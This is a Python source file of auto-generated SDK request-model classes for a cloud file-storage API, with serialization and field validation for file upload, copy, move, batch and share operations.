def validate(self):
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_max_length(self.name, 'name', 1024)
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.content_md_5 is not None:
result['content_md5'] = self.content_md_5
if self.content_type is not None:
result['content_type'] = self.content_type
if self.name is not None:
result['name'] = self.name
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.size is not None:
result['size'] = self.size
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('content_md5') is not None:
self.content_md_5 = m.get('content_md5')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('name') is not None:
self.name = m.get('name')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('size') is not None:
self.size = m.get('size')
if m.get('type') is not None:
self.type = m.get('type')
return self
class BaseFileProcessRequest(TeaModel):
"""
*\
"""
def __init__(
self,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
video_thumbnail_process: str = None,
):
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
pass
def to_map(self):
result = dict()
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class BaseFileRequest(TeaModel):
"""
*\
"""
def __init__(
self,
addition_data: dict = None,
):
# addition_data
self.addition_data = addition_data
def validate(self):
pass
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
return self
class BaseGetUploadUrlRequest(TeaModel):
"""
获取文件上传URL
"""
def __init__(
self,
content_md_5: str = None,
drive_id: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
upload_id: str = None,
):
# content_md5
self.content_md_5 = content_md_5
# drive_id
self.drive_id = drive_id
# upload_part_list
self.part_info_list = part_info_list
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.content_md_5 is not None:
self.validate_max_length(self.content_md_5, 'content_md_5', 32)
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
self.validate_required(self.upload_id, 'upload_id')
def to_map(self):
result = dict()
if self.content_md_5 is not None:
result['content_md5'] = self.content_md_5
if self.drive_id is not None:
result['drive_id'] = self.drive_id
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_md5') is not None:
self.content_md_5 = m.get('content_md5')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class BaseImageProcessRequest(TeaModel):
"""
Base image process
"""
def __init__(
self,
image_thumbnail_process: str = None,
image_url_process: str = None,
video_thumbnail_process: str = None,
):
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
pass
def to_map(self):
result = dict()
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class BaseListFileRequest(TeaModel):
"""
list file request
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
marker: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
video_thumbnail_process: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# marker
self.marker = marker
self.referer = referer
# share_id, either share_id or drive_id is required
self.share_id = share_id
self.sign_token = sign_token
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 0)
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class BaseMoveFileRequest(TeaModel):
"""
文件移动请求
"""
def __init__(
self,
drive_id: str = None,
new_name: str = None,
share_id: str = None,
):
# drive_id
self.drive_id = drive_id
# new_name
self.new_name = new_name
self.share_id = share_id
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.new_name is not None:
self.validate_max_length(self.new_name, 'new_name', 1024)
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.new_name is not None:
result['new_name'] = self.new_name
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('new_name') is not None:
self.new_name = m.get('new_name')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class BatchSubRequest(TeaModel):
"""
*\
"""
def __init__(
self,
body: dict = None,
headers: dict = None,
id: str = None,
method: str = None,
url: str = None,
):
# body 子请求的请求参数 json 字符串,可参考对于子请求文档, 当指定了body 必须传headers : "Content-Type" 对应的类型,目前子请求入参是"application/json"
self.body = body
# headers 请求头,表示body传入数据的类型
self.headers = headers
# id 用于request 和 response关联, 不允许重复
self.id = id
# method
self.method = method
# url 子请求的api path路径, 可参考对于子请求文档
self.url = url
def validate(self):
self.validate_required(self.id, 'id')
self.validate_required(self.method, 'method')
self.validate_required(self.url, 'url')
def to_map(self):
result = dict()
if self.body is not None:
result['body'] = self.body
if self.headers is not None:
result['headers'] = self.headers
if self.id is not None:
result['id'] = self.id
if self.method is not None:
result['method'] = self.method
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('body') is not None:
self.body = m.get('body')
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('method') is not None:
self.method = m.get('method')
if m.get('url') is not None:
self.url = m.get('url')
return self
class BatchRequest(TeaModel):
"""
批处理
"""
def __init__(
self,
requests: List[BatchSubRequest] = None,
resource: str = None,
):
# Requests 请求合集
self.requests = requests
# 支持的资源类型
self.resource = resource
def validate(self):
self.validate_required(self.requests, 'requests')
if self.requests:
for k in self.requests:
if k:
k.validate()
self.validate_required(self.resource, 'resource')
def to_map(self):
result = dict()
result['requests'] = []
if self.requests is not None:
for k in self.requests:
result['requests'].append(k.to_map() if k else None)
if self.resource is not None:
result['resource'] = self.resource
return result
def from_map(self, m: dict = None):
m = m or dict()
self.requests = []
if m.get('requests') is not None:
for k in m.get('requests'):
temp_model = BatchSubRequest()
self.requests.append(temp_model.from_map(k))
if m.get('resource') is not None:
self.resource = m.get('resource')
return self
class CCPGetDirSizeInfoRequest(TeaModel):
"""
获取文件夹size信息
"""
def __init__(
self,
drive_id: str = None,
file_id: str = None,
share_id: str = None,
):
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
# share_id, either share_id or drive_id is required
self.share_id = share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
def to_map(self):
result = dict()
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class CancelShareLinkRequest(TeaModel):
"""
cancel_share_link request
"""
def __init__(
self,
share_id: str = None,
):
# share_id
self.share_id = share_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class CompleteFileRequest(TeaModel):
"""
合并文件上传任务
"""
def __init__(
self,
addition_data: dict = None,
drive_id: str = None,
file_id: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
upload_id: str = None,
):
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
# part_info_list
self.part_info_list = part_info_list
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class CopyFileRequest(TeaModel):
"""
文件拷贝
"""
def __init__(
self,
auto_rename: bool = None,
drive_id: str = None,
file_id: str = None,
file_id_path: str = None,
new_name: str = None,
share_id: str = None,
to_drive_id: str = None,
to_parent_file_id: str = None,
to_share_id: str = None,
):
# auto_rename
type: boolean
self.auto_rename = auto_rename
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
self.file_id_path = file_id_path
# new_name
self.new_name = new_name
# share_id, either share_id or drive_id is required
self.share_id = share_id
# to_drive_id
self.to_drive_id = to_drive_id
# to_parent_file_id
self.to_parent_file_id = to_parent_file_id
# to_drive_id
self.to_share_id = to_share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
if self.new_name is not None:
self.validate_max_length(self.new_name, 'new_name', 1024)
if self.to_drive_id is not None:
self.validate_pattern(self.to_drive_id, 'to_drive_id', '[0-9]+')
self.validate_required(self.to_parent_file_id, 'to_parent_file_id')
if self.to_parent_file_id is not None:
self.validate_max_length(self.to_parent_file_id, 'to_parent_file_id', 50)
self.validate_pattern(self.to_parent_file_id, 'to_parent_file_id', '[a-z0-9.-_]{1,50}')
if self.to_share_id is not None:
self.validate_pattern(self.to_share_id, 'to_share_id', '[0-9]+')
def to_map(self):
result = dict()
if self.auto_rename is not None:
result['auto_rename'] = self.auto_rename
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.new_name is not None:
result['new_name'] = self.new_name
if self.share_id is not None:
result['share_id'] = self.share_id
if self.to_drive_id is not None:
result['to_drive_id'] = self.to_drive_id
if self.to_parent_file_id is not None:
result['to_parent_file_id'] = self.to_parent_file_id
if self.to_share_id is not None:
result['to_share_id'] = self.to_share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auto_rename') is not None:
self.auto_rename = m.get('auto_rename')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('new_name') is not None:
self.new_name = m.get('new_name')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('to_drive_id') is not None:
self.to_drive_id = m.get('to_drive_id')
if m.get('to_parent_file_id') is not None:
self.to_parent_file_id = m.get('to_parent_file_id')
if m.get('to_share_id') is not None:
self.to_share_id = m.get('to_share_id')
return self
class CreateDriveRequest(TeaModel):
"""
create drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
default: bool = None,
description: str = None,
drive_name: str = None,
drive_type: str = None,
encrypt_mode: str = None,
location: str = None,
owner: str = None,
relative_path: str = None,
status: str = None,
store_id: str = None,
total_size: int = None,
):
self.headers = headers
# 是否默认drive, 只允许设置一个默认drive
self.default = default
# 描述信息
self.description = description
# Drive 名称
self.drive_name = drive_name
# Drive类型
self.drive_type = drive_type
self.encrypt_mode = encrypt_mode
# location
self.location = location
# 所属者
self.owner = owner
# domain的PathType为OSSPath时必选。 Drive存储基于store的相对路径
self.relative_path = relative_path
# 状态
self.status = status
# StoreID , domain的PathType为OSSPath时必选
self.store_id = store_id
# 总大小,单位Byte [如果设置 -1 代表不限制]
self.total_size = total_size
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
self.validate_required(self.drive_name, 'drive_name')
if self.drive_name is not None:
self.validate_max_length(self.drive_name, 'drive_name', 1024)
self.validate_required(self.owner, 'owner')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.default is not None:
result['default'] = self.default
if self.description is not None:
result['description'] = self.description
if self.drive_name is not None:
result['drive_name'] = self.drive_name
if self.drive_type is not None:
result['drive_type'] = self.drive_type
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.location is not None:
result['location'] = self.location
if self.owner is not None:
result['owner'] = self.owner
if self.relative_path is not None:
result['relative_path'] = self.relative_path
if self.status is not None:
result['status'] = self.status
if self.store_id is not None:
result['store_id'] = self.store_id
if self.total_size is not None:
result['total_size'] = self.total_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('default') is not None:
self.default = m.get('default')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('drive_name') is not None:
self.drive_name = m.get('drive_name')
if m.get('drive_type') is not None:
self.drive_type = m.get('drive_type')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('relative_path') is not None:
self.relative_path = m.get('relative_path')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('total_size') is not None:
self.total_size = m.get('total_size')
return self
class ImageMediaMetadata(TeaModel):
"""
*\
"""
def __init__(
self,
height: int = None,
width: int = None,
):
# height
self.height = height
# width:
self.width = width
def validate(self):
pass
def to_map(self):
result = dict()
if self.height is not None:
result['height'] = self.height
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('height') is not None:
self.height = m.get('height')
if m.get('width') is not None:
self.width = m.get('width')
return self
class VideoMediaMetadata(TeaModel):
"""
*\
"""
def __init__(
self,
duration: str = None,
):
# Duration
self.duration = duration
def validate(self):
pass
def to_map(self):
result = dict()
if self.duration is not None:
result['duration'] = self.duration
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('duration') is not None:
self.duration = m.get('duration')
return self
class CreateFileRequest(TeaModel):
"""
创建文件
"""
def __init__(
self,
addition_data: dict = None,
auto_rename: bool = None,
check_name_mode: str = None,
content_hash: str = None,
content_hash_name: str = None,
content_md_5: str = None,
content_type: str = None,
description: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_id: str = None,
force_upload_to_location: bool = None,
hidden: bool = None,
image_media_metadata: ImageMediaMetadata = None,
labels: List[str] = None,
last_updated_at: str = None,
location: str = None,
meta: str = None,
name: str = None,
parent_file_id: str = None,
parent_file_id_path: str = None,
part_info_list: List[UploadPartInfo] = None,
pre_hash: str = None,
share_id: str = None,
size: int = None,
streams_info: dict = None,
type: str = None,
user_meta: str = None,
video_media_metadata: VideoMediaMetadata = None,
):
# addition_data
self.addition_data = addition_data
self.auto_rename = auto_rename
# check_name_mode
self.check_name_mode = check_name_mode
# content_hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# ContentMd5
self.content_md_5 = content_md_5
# ContentType
self.content_type = content_type
# description
self.description = description
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# file_id
self.file_id = file_id
# force_upload_to_location
self.force_upload_to_location = force_upload_to_location
# hidden
self.hidden = hidden
self.image_media_metadata = image_media_metadata
# labels
self.labels = labels
# last_updated_at
self.last_updated_at = last_updated_at
# location
self.location = location
self.meta = meta
# Name
self.name = name
# parent_file_id
self.parent_file_id = parent_file_id
self.parent_file_id_path = parent_file_id_path
# part_info_list
self.part_info_list = part_info_list
# pre_hash
self.pre_hash = pre_hash
# share_id
example
self.share_id = share_id
# Size
self.size = size
# streams_info
self.streams_info = streams_info
# Type
self.type = type
# user_meta
self.user_meta = user_meta
self.video_media_metadata = video_media_metadata
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.image_media_metadata:
self.image_media_metadata.validate()
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_max_length(self.name, 'name', 1024)
self.validate_required(self.parent_file_id, 'parent_file_id')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
self.validate_required(self.type, 'type')
if self.video_media_metadata:
self.video_media_metadata.validate()
def to_map(self):
result = dict()
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.auto_rename is not None:
result['auto_rename'] = self.auto_rename
if self.check_name_mode is not None:
result['check_name_mode'] = self.check_name_mode
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_md_5 is not None:
result['content_md5'] = self.content_md_5
if self.content_type is not None:
result['content_type'] = self.content_type
if self.description is not None:
result['description'] = self.description
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_id is not None:
result['file_id'] = self.file_id
if self.force_upload_to_location is not None:
result['force_upload_to_location'] = self.force_upload_to_location
if self.hidden is not None:
result['hidden'] = self.hidden
if self.image_media_metadata is not None:
result['image_media_metadata'] = self.image_media_metadata.to_map()
if self.labels is not None:
result['labels'] = self.labels
if self.last_updated_at is not None:
result['last_updated_at'] = self.last_updated_at
if self.location is not None:
result['location'] = self.location
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.parent_file_id_path is not None:
result['parent_file_id_path'] = self.parent_file_id_path
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.pre_hash is not None:
result['pre_hash'] = self.pre_hash
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.streams_info is not None:
result['streams_info'] = self.streams_info
if self.type is not None:
result['type'] = self.type
if self.user_meta is not None:
result['user_meta'] = self.user_meta
if self.video_media_metadata is not None:
result['video_media_metadata'] = self.video_media_metadata.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('auto_rename') is not None:
self.auto_rename = m.get('auto_rename')
if m.get('check_name_mode') is not None:
self.check_name_mode = m.get('check_name_mode')
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_md5') is not None:
self.content_md_5 = m.get('content_md5')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('force_upload_to_location') is not None:
self.force_upload_to_location = m.get('force_upload_to_location')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('image_media_metadata') is not None:
temp_model = ImageMediaMetadata()
self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('last_updated_at') is not None:
self.last_updated_at = m.get('last_updated_at')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('parent_file_id_path') is not None:
self.parent_file_id_path = m.get('parent_file_id_path')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('pre_hash') is not None:
self.pre_hash = m.get('pre_hash')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('streams_info') is not None:
self.streams_info = m.get('streams_info')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
if m.get('video_media_metadata') is not None:
temp_model = VideoMediaMetadata()
self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
return self
class CreateShareLinkRequest(TeaModel):
"""
create_share_link request
"""
def __init__(
self,
description: str = None,
drive_id: str = None,
expiration: str = None,
file_id: str = None,
file_id_list: List[str] = None,
file_path_list: List[str] = None,
share_name: str = None,
share_pwd: str = None,
):
# description
self.description = description
# drive_id
self.drive_id = drive_id
# expiration
self.expiration = expiration
# file_id
self.file_id = file_id
# file_id_list
self.file_id_list = file_id_list
# file_path_list
self.file_path_list = file_path_list
# share_name
self.share_name = share_name
# share_pwd
self.share_pwd = share_pwd
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.expiration, 'expiration')
self.validate_required(self.file_id, 'file_id')
self.validate_required(self.file_id_list, 'file_id_list')
if self.file_id_list is not None:
self.validate_maximum(self.file_id_list, 'file_id_list', 50)
self.validate_minimum(self.file_id_list, 'file_id_list', 1)
self.validate_required(self.file_path_list, 'file_path_list')
if self.file_path_list is not None:
self.validate_maximum(self.file_path_list, 'file_path_list', 50)
self.validate_minimum(self.file_path_list, 'file_path_list', 1)
if self.share_pwd is not None:
self.validate_maximum(self.share_pwd, 'share_pwd', 64)
self.validate_minimum(self.share_pwd, 'share_pwd', 0)
def to_map(self):
result = dict()
if self.description is not None:
result['description'] = self.description
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expiration is not None:
result['expiration'] = self.expiration
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_list is not None:
result['file_id_list'] = self.file_id_list
if self.file_path_list is not None:
result['file_path_list'] = self.file_path_list
if self.share_name is not None:
result['share_name'] = self.share_name
if self.share_pwd is not None:
result['share_pwd'] = self.share_pwd
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('description') is not None:
self.description = m.get('description')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_list') is not None:
self.file_id_list = m.get('file_id_list')
if m.get('file_path_list') is not None:
self.file_path_list = m.get('file_path_list')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
if m.get('share_pwd') is not None:
self.share_pwd = m.get('share_pwd')
return self
class CreateShareRequest(TeaModel):
"""
create share request
"""
def __init__(
self,
headers: Dict[str, str] = None,
description: str = None,
drive_id: str = None,
expiration: str = None,
owner: str = None,
owner_type: str = None,
permissions: List[str] = None,
share_file_id: str = None,
share_file_path: str = None,
share_name: str = None,
share_policy: List[SharePermissionPolicy] = None,
status: str = None,
):
self.headers = headers
# description
self.description = description
# drive_id
self.drive_id = drive_id
# expiration
self.expiration = expiration
# owner
self.owner = owner
# owner_type
self.owner_type = owner_type
# permissions
self.permissions = permissions
# share_file_id
self.share_file_id = share_file_id
# share_file_path
self.share_file_path = share_file_path
# share_name
self.share_name = share_name
# share create policy
share_policy
self.share_policy = share_policy
# status
self.status = status
def validate(self):
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.owner, 'owner')
if self.share_policy:
for k in self.share_policy:
if k:
k.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.description is not None:
result['description'] = self.description
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expiration is not None:
result['expiration'] = self.expiration
if self.owner is not None:
result['owner'] = self.owner
if self.owner_type is not None:
result['owner_type'] = self.owner_type
if self.permissions is not None:
result['permissions'] = self.permissions
if self.share_file_id is not None:
result['share_file_id'] = self.share_file_id
if self.share_file_path is not None:
result['share_file_path'] = self.share_file_path
if self.share_name is not None:
result['share_name'] = self.share_name
result['share_policy'] = []
if self.share_policy is not None:
for k in self.share_policy:
result['share_policy'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
return result
